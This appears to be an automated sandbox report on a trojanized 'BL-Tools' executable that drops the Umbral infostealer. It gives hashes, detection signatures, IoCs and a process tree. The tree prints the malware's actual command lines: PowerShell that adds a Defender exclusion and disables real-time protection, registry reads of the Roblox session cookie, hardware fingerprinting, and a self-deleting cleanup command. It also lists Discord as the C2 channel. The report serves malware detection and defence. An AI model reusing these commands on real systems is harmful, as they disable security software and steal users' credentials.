Analysis
-
max time kernel
99s -
max time network
93s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
15-07-2024 05:53
Static task
static1
Behavioral task
behavioral1
Sample
BL-Tools-v2.8.3.exe
Resource
win7-20240708-en
General
-
Target
BL-Tools-v2.8.3.exe
-
Size
6.4MB
-
MD5
3488ad52666afe9800364a9c34f9725d
-
SHA1
3412ee1bb608e54b5c80c210432ca23c0c3dd766
-
SHA256
aa23463d85a070a894711f628356694599b8eeca33e3e3dc161f2ef765932235
-
SHA512
e5f42f9f71557720cb7072a37107be5224020dfa94a49a42a56107b0bd8be84aef28f9191705966861fdd6b7a50ff379c3fc36bd2f56e194142711fe9790d06a
-
SSDEEP
196608:cLzA2rwXK0ARSWsQPQJvCvHm9EVi9RZckSIJH:0HkKvwxQjHmuiTZckS
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral2/files/0x0007000000023498-29.dat family_umbral behavioral2/memory/1372-37-0x00000221E3CB0000-0x00000221E3CF0000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4340 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts Umbral.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-464762018-485119342-1613148473-1000\Control Panel\International\Geo\Nation BL-Tools-v2.8.3.exe -
Executes dropped EXE 2 IoCs
pid Process 3984 BLTools 2.8.4 FIX.exe 1372 Umbral.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 29 discord.com 30 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
pid Process 3984 BLTools 2.8.4 FIX.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 320 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3036 PING.EXE -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1372 Umbral.exe 4340 powershell.exe 4340 powershell.exe 1248 powershell.exe 1248 powershell.exe 3448 powershell.exe 3448 powershell.exe 560 powershell.exe 560 powershell.exe 4988 powershell.exe 4988 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2988 BL-Tools-v2.8.3.exe Token: SeDebugPrivilege 1372 Umbral.exe Token: SeIncreaseQuotaPrivilege 4280 wmic.exe Token: SeSecurityPrivilege 4280 wmic.exe Token: SeTakeOwnershipPrivilege 4280 wmic.exe Token: SeLoadDriverPrivilege 4280 wmic.exe Token: SeSystemProfilePrivilege 4280 wmic.exe Token: SeSystemtimePrivilege 4280 wmic.exe Token: SeProfSingleProcessPrivilege 4280 wmic.exe Token: SeIncBasePriorityPrivilege 4280 wmic.exe Token: SeCreatePagefilePrivilege 4280 wmic.exe Token: SeBackupPrivilege 4280 wmic.exe Token: SeRestorePrivilege 4280 wmic.exe Token: SeShutdownPrivilege 4280 wmic.exe Token: SeDebugPrivilege 4280 wmic.exe Token: SeSystemEnvironmentPrivilege 4280 wmic.exe Token: SeRemoteShutdownPrivilege 4280 wmic.exe Token: SeUndockPrivilege 4280 wmic.exe Token: SeManageVolumePrivilege 4280 wmic.exe Token: 33 4280 wmic.exe Token: 34 4280 wmic.exe Token: 35 4280 wmic.exe Token: 36 4280 wmic.exe Token: SeIncreaseQuotaPrivilege 4280 wmic.exe Token: SeSecurityPrivilege 4280 wmic.exe Token: SeTakeOwnershipPrivilege 4280 wmic.exe Token: SeLoadDriverPrivilege 4280 wmic.exe Token: SeSystemProfilePrivilege 4280 wmic.exe Token: SeSystemtimePrivilege 4280 wmic.exe Token: SeProfSingleProcessPrivilege 4280 wmic.exe Token: SeIncBasePriorityPrivilege 4280 wmic.exe Token: SeCreatePagefilePrivilege 4280 wmic.exe Token: SeBackupPrivilege 4280 wmic.exe Token: SeRestorePrivilege 4280 wmic.exe Token: SeShutdownPrivilege 4280 wmic.exe Token: SeDebugPrivilege 4280 wmic.exe Token: SeSystemEnvironmentPrivilege 4280 wmic.exe Token: SeRemoteShutdownPrivilege 4280 wmic.exe Token: SeUndockPrivilege 4280 wmic.exe Token: SeManageVolumePrivilege 4280 wmic.exe Token: 33 4280 wmic.exe Token: 34 4280 wmic.exe Token: 35 4280 wmic.exe Token: 36 4280 wmic.exe Token: SeDebugPrivilege 4340 powershell.exe Token: SeDebugPrivilege 1248 powershell.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeDebugPrivilege 560 powershell.exe Token: SeIncreaseQuotaPrivilege 3172 wmic.exe Token: SeSecurityPrivilege 3172 wmic.exe Token: SeTakeOwnershipPrivilege 3172 wmic.exe Token: SeLoadDriverPrivilege 3172 wmic.exe Token: SeSystemProfilePrivilege 3172 wmic.exe Token: SeSystemtimePrivilege 3172 wmic.exe Token: SeProfSingleProcessPrivilege 3172 wmic.exe Token: SeIncBasePriorityPrivilege 3172 wmic.exe Token: SeCreatePagefilePrivilege 3172 wmic.exe Token: SeBackupPrivilege 3172 wmic.exe Token: SeRestorePrivilege 3172 wmic.exe Token: SeShutdownPrivilege 3172 wmic.exe Token: SeDebugPrivilege 3172 wmic.exe Token: SeSystemEnvironmentPrivilege 3172 wmic.exe Token: SeRemoteShutdownPrivilege 3172 wmic.exe Token: SeUndockPrivilege 3172 wmic.exe -
Suspicious use of WriteProcessMemory 31 IoCs
description pid Process procid_target PID 2988 wrote to memory of 3984 2988 BL-Tools-v2.8.3.exe 85 PID 2988 wrote to memory of 3984 2988 BL-Tools-v2.8.3.exe 85 PID 2988 wrote to memory of 3984 2988 BL-Tools-v2.8.3.exe 85 PID 2988 wrote to memory of 1372 2988 BL-Tools-v2.8.3.exe 89 PID 2988 wrote to memory of 1372 2988 BL-Tools-v2.8.3.exe 89 PID 1372 wrote to memory of 4280 1372 Umbral.exe 90 PID 1372 wrote to memory of 4280 1372 Umbral.exe 90 PID 1372 wrote to memory of 4220 1372 Umbral.exe 92 PID 1372 wrote to memory of 4220 1372 Umbral.exe 92 PID 1372 wrote to memory of 4340 1372 Umbral.exe 94 PID 1372 wrote to memory of 4340 1372 Umbral.exe 94 PID 1372 wrote to memory of 1248 1372 Umbral.exe 96 PID 1372 wrote to memory of 1248 1372 Umbral.exe 96 PID 1372 wrote to memory of 3448 1372 Umbral.exe 98 PID 1372 wrote to memory of 3448 1372 Umbral.exe 98 PID 1372 wrote to memory of 560 1372 Umbral.exe 100 PID 1372 wrote to memory of 560 1372 Umbral.exe 100 PID 1372 wrote to memory of 3172 1372 Umbral.exe 102 PID 1372 wrote to memory of 3172 1372 Umbral.exe 102 PID 1372 wrote to memory of 2860 1372 Umbral.exe 104 PID 1372 wrote to memory of 2860 1372 Umbral.exe 104 PID 1372 wrote to memory of 3728 1372 Umbral.exe 106 PID 1372 wrote to memory of 3728 1372 Umbral.exe 106 PID 1372 wrote to memory of 4988 1372 Umbral.exe 108 PID 1372 wrote to memory of 4988 1372 Umbral.exe 108 PID 1372 wrote to memory of 320 1372 Umbral.exe 110 PID 1372 wrote to memory of 320 1372 Umbral.exe 110 PID 1372 wrote to memory of 2648 1372 Umbral.exe 112 PID 1372 wrote to memory of 2648 1372 Umbral.exe 112 PID 2648 wrote to memory of 3036 2648 cmd.exe 114 PID 2648 wrote to memory of 3036 2648 cmd.exe 114 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 4220 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\BL-Tools-v2.8.3.exe"C:\Users\Admin\AppData\Local\Temp\BL-Tools-v2.8.3.exe"1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2988 -
C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"C:\Users\Admin\AppData\Local\Temp\BLTools 2.8.4 FIX.exe"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3984
-
-
C:\Users\Admin\AppData\Local\Temp\Umbral.exe"C:\Users\Admin\AppData\Local\Temp\Umbral.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1372 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4280
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"3⤵
- Views/modifies file attributes
PID:4220
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1248
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3448
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:560
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3172
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:2860
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3728
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4988
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:320
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:2648 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:3036
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5548dd08570d121a65e82abb7171cae1c
SHA11a1b5084b3a78f3acd0d811cc79dbcac121217ab
SHA256cdf17b8532ebcebac3cfe23954a30aa32edd268d040da79c82687e4ccb044adc
SHA51237b98b09178b51eec9599af90d027d2f1028202efc1633047e16e41f1a95610984af5620baac07db085ccfcb96942aafffad17aa1f44f63233e83869dc9f697b
-
Filesize
1KB
MD50dfa23c8382ea4711ba7eee065a063ed
SHA1249319e8efedeccc9aa57272f008a308bf97b675
SHA25648bd4157137a3171568c13929dc30862bb704bb04426e4d154c23010ba129f8c
SHA51266aa911693145f702f36795053a002c39441b57c7a72b35e5ee23218a2abef1e5065ad22220f5948856eeb72559844696d9e40e93ae2240ed10f7f5df3fbcf73
-
Filesize
944B
MD56d3e9c29fe44e90aae6ed30ccf799ca8
SHA1c7974ef72264bbdf13a2793ccf1aed11bc565dce
SHA2562360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d
SHA51260c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a
-
Filesize
948B
MD5df6c4e5c3091c14551e6c92f07717617
SHA11ea87111035496c1b2b74cef8b5c62d00ac072c9
SHA256b79dc75372707ff84a643a9e4cff6fad2d1a936b54d458088850c62c96e2f231
SHA512ab861efd0ff28a4bae3513a884d5b00c1b68d8f0bd54a00428bbb65a6954f8778e8f5300362025265251cb425c5ed77608b10776f382c3b392916ae46e38db35
-
Filesize
3.1MB
MD5fe611814d50bd962d1d85e3fb7425ff8
SHA125ca8e5f48d694d4f715bf5a299062f4a979aefd
SHA256747072a4094dd0004d84abd221863ca2db676853c5ca27dd9b962650790a6472
SHA512a7a8dad9e6fdfd515203d6165fd9a89902c9d82adaa4bd24992a6e991501317bafaa3066ebbae17ecf0223e7a25aacc098c3449fa7533529c2eba79acf85ef14
-
Filesize
229KB
MD54a2673a8ceb3c0afb830cb145d1bb9fe
SHA18b12f4955e53b2fdb150cf29aa9fc01e8937c14e
SHA2564cb6bb75074c44c2a773918ae253e711c364d17519f903e3bcb6c4c50747f279
SHA5124b41674a2a691b0b5cf80e3768ca8add7971fc94b812c06c102be3075bfcb859a62fb11bd87880d05239f03e09bb3d627e26d4eebc9f97a83139b62b04304f77
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82